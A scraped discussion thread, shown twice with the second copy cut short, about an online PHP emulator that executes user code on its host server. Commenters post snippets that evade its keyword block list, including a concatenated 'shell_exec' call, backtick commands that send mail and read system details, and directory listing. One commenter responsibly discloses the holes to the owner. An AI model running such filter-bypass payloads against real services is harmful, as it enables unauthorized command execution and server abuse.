Online PHP Emulator (opens in new tab)

(scripterous.com)

20 pointsdatawalke16y ago18 comments

18 comments

17 comments · 11 top-level

jawngee16y ago· 4 in thread

Sweet, an open mail relay:

<?php echo `echo 'hello' | mail -s Hello darth.vader@yahright.com`; ?>

jkkramer16y ago

Poor guy didn't think this through very well...

    <?php
    $fn = "shel" . "l_exe" . "c";
    echo nl2br(htmlentities($fn("cat response.php")));
    ?>

colonelxc16y ago

Only "security" is this array of items which are regexed out of whatever you submit (and as you pointed out, completely fail to even prevent those functions from being called.

$replace = array('<?php', '?>', '<?', 'mkdir', 'eval', 'exec', 'copy', 'move', 'curl', 'passthru', 'system', 'popen', 'proc_close', 'proc_open', 'proc_ terminate', 'proc_nice', 'shell', 'dl');

aaroneous16y ago

Looks like they left a few other things open too =X

icco16y ago

Ya, although curl is disabled.

A fun one: <?php echo `uname -a `; ?> Output: Linux fuel.bravegamer.com 2.6.18-128.1.10.el5PAE #1 SMP Thu May 7 11:14:31 EDT 2009 i686 i686 i386 GNU/Linux

1 more reply

clemesha16y ago· 1 in thread

Online Python emulator: http://live.codenode.org (uses Google App Engine to execute the code). Screenshots and docs on the homepage here: http://codenode.org

siddhant16y ago

For Python, there is http://shell.appspot.com as well.

_ck_16y ago· 1 in thread

It's not just an emulator, it's running real, full PHP (try PHPINFO).

Not in safe-mode, also running eaccelerator. It will be cracked within a week, I am sure.

  $handle = opendir('.');   
  while (false !== ($file = readdir($handle))) {echo "$file\n";}

colonelxc16y ago

A week? I wouldn't give it that long.

lucumo16y ago

Explored a bit and sent the guy an email at the whois address of another domain that seems in his possession. The email address in scripterous.com seems broken. root@localhost doesn't seem to get read.

Hi,

Your site scripterous.com is a security leak for your server. I was able to kill web server processes, investigate your server, and generally do things I shouldn't be able to do. A denial of service attack would be easy by constantly killing the web server and if there was a local root exploit (which I didn't look for) I could have executed that as well.

I wanted to send an email to the root account on the server, but it doesn't seem to get read.

You can view a bit more of the discussion on the security implications at http://news.ycombinator.com/item?id=827500 (Despite the name and the subject we're discussing, that site is normally not about this kind of hacking.)

Your site is an interesting concept and it would definitely be interesting to have it around. Nonetheless I fear that the concept of the site is the cause of the security leaks. I'm not a security expert, but it is my opinion that it's not possible to make a site like this secure, without reimplementing PHP.

Best regards,

[Real name omitted, because I don't want this nick name to show up when people search my real name.]

datawalkeOP16y ago

Well, that is what I get for uploading and old project without taking in some consideration on it. Thank you to lucumo for the head's up on this and the rest of your for your exploits. Things should be a bit more secure now.

pierrefar16y ago

Horrible security hole.

mail() is working.

Can read and browse various directories using opendir() and friends.

deutronium16y ago

http://codepad.org/ is pretty similar, it can do lots of other languages though as well like C, C++, Python...

jacktasia16y ago

I've been using something similar for a while but you download it and run it locally (hopefully):

http://www.hping.org/phpinteractive/

zackattack16y ago

Fun thread.

../tmp/ is writeable.

ilyak16y ago

The poor guy could take quercus and make it safe. He didn't because he's still a PHP kid.

daok16y ago

You can see some warning at the top of the page...

Warning (512): Cache not configured properly. Please check Cache::config(); in APP/config/core.php [CORE/cake/libs/configure.php, line 663]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 684]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 691]

...

j / k navigate · click thread line to collapse

18 comments

17 comments · 11 top-level

jawngee16y ago· 4 in thread

Sweet, an open mail relay:

<?php echo `echo 'hello' | mail -s Hello darth.vader@yahright.com`; ?>

jkkramer16y ago

Poor guy didn't think this through very well...

    <?php
    $fn = "shel" . "l_exe" . "c";
    echo nl2br(htmlentities($fn("cat response.php")));
    ?>

colonelxc16y ago

Only "security" is this array of items which are regexed out of whatever you submit (and as you pointed out, completely fail to even prevent those functions from being called.

$replace = array('<?php', '?>', '<?', 'mkdir', 'eval', 'exec', 'copy', 'move', 'curl', 'passthru', 'system', 'popen', 'proc_close', 'proc_open', 'proc_ terminate', 'proc_nice', 'shell', 'dl');

aaroneous16y ago

Looks like they left a few other things open too =X

icco16y ago

Ya, although curl is disabled.

A fun one: <?php echo `uname -a `; ?> Output: Linux fuel.bravegamer.com 2.6.18-128.1.10.el5PAE #1 SMP Thu May 7 11:14:31 EDT 2009 i686 i686 i386 GNU/Linux

1 more reply

clemesha16y ago· 1 in thread

Online Python emulator: http://live.codenode.org (uses Google App Engine to execute the code). Screenshots and docs on the homepage here: http://codenode.org

siddhant16y ago

For Python, there is http://shell.appspot.com as well.

_ck_16y ago· 1 in thread

It's not just an emulator, it's running real, full PHP (try PHPINFO).

Not in safe-mode, also running eaccelerator. It will be cracked within a week, I am sure.

  $handle = opendir('.');   
  while (false !== ($file = readdir($handle))) {echo "$file\n";}

colonelxc16y ago

A week? I wouldn't give it that long.

lucumo16y ago

Hi,

I wanted to send an email to the root account on the server, but it doesn't seem to get read.

Best regards,

[Real name omitted, because I don't want this nick name to show up when people search my real name.]

datawalkeOP16y ago

pierrefar16y ago

Horrible security hole.

mail() is working.

Can read and browse various directories using opendir() and friends.

deutronium16y ago

http://codepad.org/ is pretty similar, it can do lots of other languages though as well like C, C++, Python...

jacktasia16y ago

I've been using something similar for a while but you download it and run it locally (hopefully):

http://www.hping.org/phpinteractive/

zackattack16y ago

Fun thread.

../tmp/ is writeable.

ilyak16y ago

The poor guy could take quercus and make it safe. He didn't because he's still a PHP kid.

daok16y ago

You can see some warning at the top of the page...

Warning (512): Cache not configured properly. Please check Cache::config(); in APP/config/core.php [CORE/cake/libs/configure.php, line 663]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 684]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 691]

...

j / k navigate · click thread line to collapse